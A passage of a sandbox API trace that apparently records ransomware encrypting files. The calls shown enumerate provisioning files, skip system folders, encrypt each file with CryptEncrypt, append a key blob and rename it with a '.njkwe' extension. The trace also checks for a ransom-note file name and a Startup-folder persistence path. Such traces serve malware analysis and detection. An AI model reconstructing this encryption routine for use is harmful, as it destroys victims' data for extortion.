returned 1 [0080.698] GetProcessHeap () returned 0xbe0000 [0080.698] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.698] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 195 [0080.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\468__connections_cellular_etisalat (united arab emirates)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\468__connections_cellular_etisalat (united arab emirates)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.699] GetProcessHeap () returned 0xbe0000 [0080.699] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.700] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910e2c39, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910e2c39, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910e2c39, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x29f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml", cAlternateFileName="469__C~1.PRO")) returned 1 [0080.700] lstrcmpiW (lpString1="469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.700] lstrcmpiW (lpString1="469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.700] lstrcmpiW (lpString1="469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.700] lstrcmpiW (lpString1="469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.700] lstrcmpiW (lpString1="469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.700] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml") returned 190 [0080.700] StrStrIW (lpFirst="469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.700] lstrcmpW (lpString1="469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.700] lstrcmpW (lpString1="469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.700] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\469__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.700] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\469__connections_cellular_cable & wireless guernsey ltd (united kingdom)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.700] GetTickCount () returned 0x11547d3 [0080.700] GetTickCount () returned 0x11547d3 [0080.700] GetTickCount () returned 0x11547d3 [0080.700] GetTickCount () returned 0x11547d3 [0080.700] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.701] GetProcessHeap () returned 0xbe0000 [0080.701] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.701] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x29f, lpOverlapped=0x0) returned 1 [0080.703] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.703] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x29f, lpOverlapped=0x0) returned 1 [0080.703] GetProcessHeap () returned 0xbe0000 [0080.703] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.703] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.704] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.704] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.704] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.704] CloseHandle (hObject=0x43c) returned 1 [0080.704] GetProcessHeap () returned 0xbe0000 [0080.704] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.704] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 210 [0080.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\469__connections_cellular_cable & wireless guernsey ltd (united kingdom)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\469__Connections_Cellular_Cable & Wireless Guernsey Ltd (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\469__connections_cellular_cable & wireless guernsey ltd (united kingdom)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.705] GetProcessHeap () returned 0xbe0000 [0080.705] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.705] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9026e179, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9026e179, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9026e179, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml", cAlternateFileName="46__CO~1.PRO")) returned 1 [0080.709] lstrcmpiW (lpString1="46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.709] lstrcmpiW (lpString1="46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.709] lstrcmpiW (lpString1="46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.709] lstrcmpiW (lpString1="46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.709] lstrcmpiW (lpString1="46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.709] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml") returned 159 [0080.709] StrStrIW (lpFirst="46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.709] lstrcmpW (lpString1="46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.709] lstrcmpW (lpString1="46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.709] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\46__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.709] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\46__connections_cellular_orange (belgium)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.709] GetTickCount () returned 0x11547e3 [0080.709] GetTickCount () returned 0x11547e3 [0080.709] GetTickCount () returned 0x11547e3 [0080.709] GetTickCount () returned 0x11547e3 [0080.709] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.709] GetProcessHeap () returned 0xbe0000 [0080.709] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.709] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0080.711] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.711] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0080.711] GetProcessHeap () returned 0xbe0000 [0080.711] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.711] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.711] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.711] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.712] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.712] CloseHandle (hObject=0x43c) returned 1 [0080.712] GetProcessHeap () returned 0xbe0000 [0080.712] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.712] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0080.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\46__connections_cellular_orange (belgium)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\46__Connections_Cellular_ORANGE (Belgium)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\46__connections_cellular_orange (belgium)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.713] GetProcessHeap () returned 0xbe0000 [0080.713] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.713] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910e2c39, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910e2c39, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910e2c39, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml", cAlternateFileName="470__C~1.PRO")) returned 1 [0080.713] lstrcmpiW (lpString1="470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.713] lstrcmpiW (lpString1="470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.713] lstrcmpiW (lpString1="470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.713] lstrcmpiW (lpString1="470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.713] lstrcmpiW (lpString1="470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.713] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml") returned 186 [0080.713] StrStrIW (lpFirst="470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.713] lstrcmpW (lpString1="470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.713] lstrcmpW (lpString1="470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.713] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\470__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.713] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\470__connections_cellular_manx telecom (pronto gsm) (united kingdom)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.713] GetTickCount () returned 0x11547e3 [0080.713] GetTickCount () returned 0x11547e3 [0080.713] GetTickCount () returned 0x11547e3 [0080.713] GetTickCount () returned 0x11547e3 [0080.713] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.713] GetProcessHeap () returned 0xbe0000 [0080.713] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.714] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2e5, lpOverlapped=0x0) returned 1 [0080.715] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.715] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2e5, lpOverlapped=0x0) returned 1 [0080.715] GetProcessHeap () returned 0xbe0000 [0080.715] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.715] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.715] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.715] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.716] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.716] CloseHandle (hObject=0x43c) returned 1 [0080.716] GetProcessHeap () returned 0xbe0000 [0080.716] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.716] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 206 [0080.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\470__connections_cellular_manx telecom (pronto gsm) (united kingdom)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\470__Connections_Cellular_Manx Telecom (Pronto GSM) (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\470__connections_cellular_manx telecom (pronto gsm) (united kingdom)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.717] GetProcessHeap () returned 0xbe0000 [0080.717] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.717] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91108ea4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91108ea4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91108ea4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml", cAlternateFileName="471__C~1.PRO")) returned 1 [0080.717] lstrcmpiW (lpString1="471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.717] lstrcmpiW (lpString1="471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.717] lstrcmpiW (lpString1="471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.717] lstrcmpiW (lpString1="471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.717] lstrcmpiW (lpString1="471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.717] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml") returned 168 [0080.717] StrStrIW (lpFirst="471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.717] lstrcmpW (lpString1="471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.717] lstrcmpW (lpString1="471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.717] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\471__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.717] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\471__connections_cellular_o2 - uk (united kingdom)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.717] GetTickCount () returned 0x11547e3 [0080.717] GetTickCount () returned 0x11547e3 [0080.717] GetTickCount () returned 0x11547e3 [0080.717] GetTickCount () returned 0x11547e3 [0080.717] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, 